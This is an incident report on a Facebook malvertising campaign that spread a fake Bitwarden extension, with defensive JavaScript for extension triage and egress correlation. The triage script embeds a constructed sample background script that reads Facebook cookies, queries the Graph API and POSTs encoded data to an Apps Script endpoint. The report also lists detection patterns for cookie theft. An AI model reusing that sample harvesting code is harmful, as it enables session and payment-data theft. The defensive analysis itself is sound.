Full Report
Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta’s social media platform Facebook. The campaign tricks users into installing a harmful browser extension und
Analysis Summary
# Incident Report: Malvertising Campaign Distributing Fake Bitwarden Extension via Facebook
## Executive Summary
Bitdefender Labs, which tracked a series of malvertising campaigns throughout 2024, identified in November 2024 a campaign that used Facebook ads to deliver malware disguised as a Bitwarden "security update". The attackers chained a multi-step redirection, urgency-driven social engineering and browser-extension sideloading to get European users to install a malicious extension that harvested Facebook session cookies, the victim's public IP address and geolocation, and the personal, business and billing details tied to the victim's Facebook ad accounts. The campaign was found through Bitdefender Labs' own research rather than a victim report.
## Incident Details
- **Discovery Date:** Identified by Bitdefender Labs during its ongoing 2024 malvertising research; the ads first appeared on November 3, 2024.
- **Incident Date:** Campaign active from November 3, 2024.
- **Affected Organization:** Facebook users (consumers and businesses) who installed the fake extension. Victims did not need to be Bitwarden customers; the Bitwarden brand was only impersonated as a lure.
- **Sector:** Cross-sector. The ads targeted Facebook users aged 18-65; business and advertiser accounts were the highest-value victims because of the ad-account billing data the extension collected.
- **Geography:** Europe (initial targeting), with potential for expansion.
## Timeline of Events
### Initial Access
- **Date/Time:** November 3, 2024 (Launch of the specific campaign).
- **Vector:** Malicious advertisements served through Meta's Facebook advertising platform.
- **Details:** Ads impersonated the Bitwarden password manager, using urgent language ("Warning: Your Passwords Are at Risk!") to prompt users to install a supposed "security update."
### Lateral Movement
*Not applicable in the traditional sense, as this was a client-side compromise executed via user deception rather than network lateral movement.*
### Data Exfiltration/Impact
- **Vector:** Malicious browser extension installed via sideloading.
- **Details:** The extension's background script (`background.js`, loaded through `service-worker-loader.js`) ran on installation and collected:
  1. Facebook cookies, including `c_user`, which carries the logged-in user's numeric Facebook ID.
  2. The victim's public IP address and geolocation, obtained by querying `api.ipify.org` and `freeipapi.com`.
  3. Data pulled from Facebook's Graph API using the victim's session: personal details, business accounts, and the credit card and billing details attached to the victim's ad accounts.
- **Exfiltration:** The collected data was encoded and POSTed to a Google Apps Script URL (`script.google.com`) that acted as the C2 endpoint.
### Detection & Response
- **Detection:** Proactive research and monitoring by Bitdefender Labs.
- **Response Actions:** Publication of research findings to alert the public and security community on the evolving tactics.
## Attack Methodology
- **Initial Access:** Malvertising on Facebook led to a phishing page imitating the Chrome Web Store, which directed the user to download a ZIP archive hosted on Google Drive.
- **Persistence:** The user was walked through enabling Developer Mode at `chrome://extensions` and loading the unpacked extension by hand; once loaded, the extension runs at every browser start.
- **Privilege Escalation:** Not required; the user installed the extension directly with the broad permissions declared in its manifest.
- **Defense Evasion:** Sideloading an unpacked extension bypasses Chrome Web Store review and the install-time checks that apply to store-distributed extensions.
- **Credential Access:** Direct harvesting of Facebook session cookies (`c_user`).
- **Discovery:** Access to extensions management (`management` permission) and network request monitoring (`webRequest`, `declarativeNetRequest`).
- **Lateral Movement:** N/A.
- **Collection:** Harvesting Facebook cookies, running IP/location lookups, and enumerating user/business data via Facebook Graph API.
- **Exfiltration:** Data encoded and transmitted to a C2 server hosted on a Google Script URL using the `sendData()` function.
- **Impact:** Unauthorized access and theft of personal data, session cookies, and sensitive business/financial information stored within the browser context of the targeted Facebook platform.
## Impact Assessment
- **Financial:** Potential financial losses due to the compromise of credit card and billing details associated with Facebook ad accounts.
- **Data Breach:** Harvesting of Facebook user IDs, names, business/ad account details, and payment information.
- **Operational:** Account takeover and fraudulent ad spend charged to victims' ad accounts, plus the cleanup effort of revoking sessions and auditing Business Manager access.
- **Reputational:** Damage to the reputation of legitimate services involved (Bitwarden, Facebook) due to impersonation and ad platform exploitation.
## Indicators of Compromise
- **Network Indicators (Defanged):**
- C2 communication: HTTP POSTs to `script[.]google[.]com` Apps Script web-app endpoints (`/macros/s/<deployment-id>/exec`). Caveat: this is shared Google infrastructure that also serves legitimate Apps Script web apps, so treat it as a hunting lead keyed on the originating extension and request pattern, not as a domain to block outright.
- External lookups to `api[.]ipify[.]org` and `freeipapi[.]com`.
- **File Indicators:**
- Malicious extension files: `service-worker-loader.js`, `background.js`, `popup.js`.
- Installation format: ZIP archive delivered via Google Drive link.
- **Behavioral Indicators:**
- User sideloading an unpacked extension via Developer Mode.
- Extension requesting permissions including `webRequest`, `declarativeNetRequest`, and `management`.
- Background script execution upon installation (`chrome.runtime.onInstalled`).
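The data-collection flow described under Data Exfiltration and the file and behavioral indicators listed above can be checked offline before an unpacked extension is trusted. The following is an added example, not the malicious extension and not Bitdefender's tooling: a static triage script that reads a manifest and its background scripts and flags the permission set and script strings that matched this campaign. The manifest, scripts and the Apps Script deployment ID in it are constructed placeholders modelled on the report, not real indicators; the `cookies` permission is assumed, since the report lists only `webRequest`, `declarativeNetRequest` and `management`.

```javascript
'use strict';
// Added example: offline static triage of an unpacked (sideloaded) extension
// bundle. This is not the malicious extension and not Bitdefender's tooling.
// The manifest and scripts below are constructed to mirror the behaviour the
// report describes; in practice they would be read from the extension folder.

// Permissions that give an extension cookie, traffic or extension-management access.
const RISKY_PERMISSIONS = new Set([
  'cookies', 'webRequest', 'webRequestBlocking', 'declarativeNetRequest',
  'management', 'scripting', 'debugger', 'proxy',
]);
const BROAD_HOST = /^(<all_urls>|\*:\/\/\*\/\*|https?:\/\/\*\/\*)$/;
const FACEBOOK_HOST = /facebook\.com/;

// Script strings that matched the campaign; the label doubles as the finding text.
const SUSPICIOUS_STRINGS = [
  [/script\.google\.com\/macros\//i, 'Apps Script endpoint (C2 pattern)'],
  [/api\.ipify\.org|freeipapi\.com/i, 'external IP/geolocation lookup'],
  [/graph\.facebook\.com/i, 'Graph API call'],
  [/\bc_user\b/, 'reads the c_user cookie'],
  [/chrome\.cookies\.getAll/, 'bulk cookie read'],
  [/chrome\.runtime\.onInstalled/, 'runs on install'],
];

function triagePermissions(manifest) {
  const declared = manifest.permissions || [];
  const perms = declared.filter((p) => RISKY_PERMISSIONS.has(p));
  // MV3 keeps hosts in host_permissions; MV2 mixes them into permissions.
  const hosts = [...(manifest.host_permissions || []), ...declared]
    .filter((h) => BROAD_HOST.test(h) || FACEBOOK_HOST.test(h));
  return { perms, hosts };
}

function triageScripts(scripts) {
  const findings = [];
  for (const [file, code] of Object.entries(scripts)) {
    for (const [re, why] of SUSPICIOUS_STRINGS) {
      const m = code.match(re);
      if (m) findings.push({ file, why, match: m[0] });
    }
  }
  return findings;
}

// Returns the evidence plus a coarse verdict: 'high' when a C2-style endpoint
// co-occurs with cookie/Graph access, 'medium' for risky permissions plus any
// suspicious string, otherwise 'low'.
function triageExtension(manifestText, scripts) {
  const manifest = JSON.parse(manifestText);
  const { perms, hosts } = triagePermissions(manifest);
  const findings = triageScripts(scripts);
  const hasC2 = findings.some((f) => f.why.includes('C2'));
  const hasHarvest = findings.some((f) => /cookie|Graph API/.test(f.why));
  let verdict = 'low';
  if (perms.length > 0 && findings.length > 0) verdict = 'medium';
  if (hasC2 && (hasHarvest || perms.includes('cookies'))) verdict = 'high';
  return { name: manifest.name, perms, hosts, findings, verdict };
}

// Constructed sample mirroring the reported extension (the name, the Graph API
// path and the Apps Script deployment ID are placeholders, not real indicators).
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'Bitwarden Password Manager',
  version: '1.0.0',
  manifest_version: 3,
  permissions: ['cookies', 'webRequest', 'declarativeNetRequest', 'management'],
  host_permissions: ['*://*.facebook.com/*', '<all_urls>'],
  background: { service_worker: 'service-worker-loader.js' },
});
const SAMPLE_SCRIPTS = {
  'service-worker-loader.js': "importScripts('background.js');",
  'background.js': [
    'chrome.runtime.onInstalled.addListener(() => {',
    "  chrome.cookies.getAll({ domain: 'facebook.com' }, (cookies) => {",
    "    const uid = cookies.find((c) => c.name === 'c_user');",
    "    fetch('https://api.ipify.org?format=json');",
    "    fetch('https://graph.facebook.com/v17.0/me/adaccounts');",
    "    fetch('https://script.google.com/macros/s/PLACEHOLDER/exec', { method: 'POST', body: btoa('...') });",
    '  });',
    '});',
  ].join('\n'),
};

// Constructed benign control: a storage-only extension should score 'low'.
const BENIGN_MANIFEST = JSON.stringify({
  name: 'Notes', version: '0.1', manifest_version: 3,
  permissions: ['storage'], background: { service_worker: 'bg.js' },
});
const BENIGN_SCRIPTS = { 'bg.js': 'chrome.storage.local.set({ ready: true });' };

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), null, 2));
console.log('benign verdict:', triageExtension(BENIGN_MANIFEST, BENIGN_SCRIPTS).verdict);
```

The verdict logic is deliberately coarse: a single risky permission is common in legitimate extensions, so the script only escalates when the permission set and the script contents together reproduce the harvest-and-exfiltrate pattern. Obfuscated or packed scripts will defeat plain string matching, which is why the permission check is kept as an independent signal.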
## Response Actions
- **Containment:** Public disclosure of the campaign's tactics and indicators, with guidance to review installed extensions. This was a social-engineering campaign, not a vulnerability in Bitwarden or Facebook, so there was no patch to apply.
- **Eradication:** Remove the extension from `chrome://extensions`, then treat the Facebook session as compromised: log out of all active Facebook sessions, change the password, and review ad-account roles and payment methods for changes the attacker may have made.
- **Recovery Actions:** Endpoint security (e.g. Bitdefender) can block the malvertising redirect chain and flag unauthorized extensions; for business accounts, audit Business Manager access and recent ad spend.
## Lessons Learned
- Threat actors are adept at leveraging high-trust platforms (Facebook Ads) to distribute malware through multi-layered redirection schemes.
- Sideloading provides a viable method for attackers to manipulate users into bypassing standard application store security checks.
- Impersonating trusted password managers (Bitwarden) and instilling urgency is an effective social engineering tactic.
## Recommendations
- Implement endpoint security that detects unauthorized browser extensions and sideloading activity, and on managed browsers enforce it by policy: allowlist approved extensions and block everything else (in Chrome, `ExtensionSettings` or `ExtensionInstallBlocklist` with `*`, which also prevents loading unpacked extensions), and disable extension Developer Mode where the policy is available.
- Users should utilize scam detection tools (e.g., Bitdefender Scamio) to verify links before clicking, especially on social media.
- MFA should still be required everywhere, but note its limit in this case: the extension stole cookies from an already-authenticated session, and a replayed session cookie does not trigger a second-factor prompt. Pair MFA with session controls: revoke sessions on suspicion, alert on logins from new devices or locations, and keep session lifetimes short for high-value accounts.
- Security teams should monitor egress for the campaign's sequence: a public-IP lookup (`api[.]ipify[.]org`, `freeipapi[.]com`) followed shortly by a browser POST to a `script[.]google[.]com` Apps Script endpoint. Blanket blocking of `script.google.com` is rarely practical, so correlate the sequence per endpoint rather than alerting on the domain alone.
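The egress-monitoring recommendation above is easier to act on as a correlation rule than as a domain block. The following is an added example, not part of the original report: it runs a per-client rule over constructed proxy log lines and raises an alert only when an IP-lookup request is followed within a time window by a POST to an Apps Script `exec` endpoint. The log format (`<ISO timestamp> <client> <method> <host> <path>`), the client addresses and the deployment IDs are all assumptions made for the example.

```javascript
'use strict';
// Added example (not from the original report): correlation rule over proxy
// logs for the lookup-then-POST pattern. The log lines are constructed and the
// line format is an assumption: <ISO timestamp> <client ip> <method> <host> <path>.

const IP_LOOKUP_HOSTS = new Set(['api.ipify.org', 'freeipapi.com']);
// Standard Apps Script web-app deployment path; the deployment ID is unknown in advance.
const APPS_SCRIPT_EXEC = /^\/macros\/s\/[^/]+\/exec$/;

const CONSTRUCTED_LOG = `
2024-11-04T09:12:01Z 10.0.0.21 GET api.ipify.org /?format=json
2024-11-04T09:12:02Z 10.0.0.21 GET graph.facebook.com /v17.0/me/adaccounts
2024-11-04T09:12:04Z 10.0.0.21 POST script.google.com /macros/s/PLACEHOLDER_A/exec
2024-11-04T09:30:00Z 10.0.0.37 GET script.google.com /macros/s/PLACEHOLDER_B/exec
2024-11-04T10:02:10Z 10.0.0.52 GET freeipapi.com /api/json
2024-11-04T13:15:00Z 10.0.0.52 POST script.google.com /macros/s/PLACEHOLDER_C/exec
`;

function parseLogLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 5) return null;
  const [ts, client, method, host, path] = parts;
  const t = Date.parse(ts);
  if (Number.isNaN(t)) return null;
  return { t, client, method: method.toUpperCase(), host: host.toLowerCase(), path };
}

// Returns one alert per Apps Script POST that follows an IP lookup from the same
// client within windowMs. A lone GET to script.google.com (client .37, a normal
// web-app visit) and a lookup hours before a POST (client .52) are not alerted.
function correlateExfil(logText, windowMs = 10 * 60 * 1000) {
  const events = logText.split('\n').map(parseLogLine).filter(Boolean)
    .sort((a, b) => a.t - b.t);
  const lastLookup = new Map(); // client -> time of most recent IP lookup
  const alerts = [];
  for (const e of events) {
    if (IP_LOOKUP_HOSTS.has(e.host)) { lastLookup.set(e.client, e.t); continue; }
    const isScriptPost = e.method === 'POST' && e.host === 'script.google.com'
      && APPS_SCRIPT_EXEC.test(e.path);
    if (!isScriptPost) continue;
    const seen = lastLookup.get(e.client);
    if (seen !== undefined && e.t - seen <= windowMs) {
      alerts.push({
        client: e.client,
        lookupAt: new Date(seen).toISOString(),
        postAt: new Date(e.t).toISOString(),
        path: e.path,
      });
    }
  }
  return alerts;
}

console.log(JSON.stringify(correlateExfil(CONSTRUCTED_LOG), null, 2));
```

The window is the tunable part: the extension in this campaign performed the lookup and the exfiltration in one run on install, so a few minutes is generous. Widening it trades false positives (a developer's own Apps Script deployment) for coverage of variants that delay exfiltration.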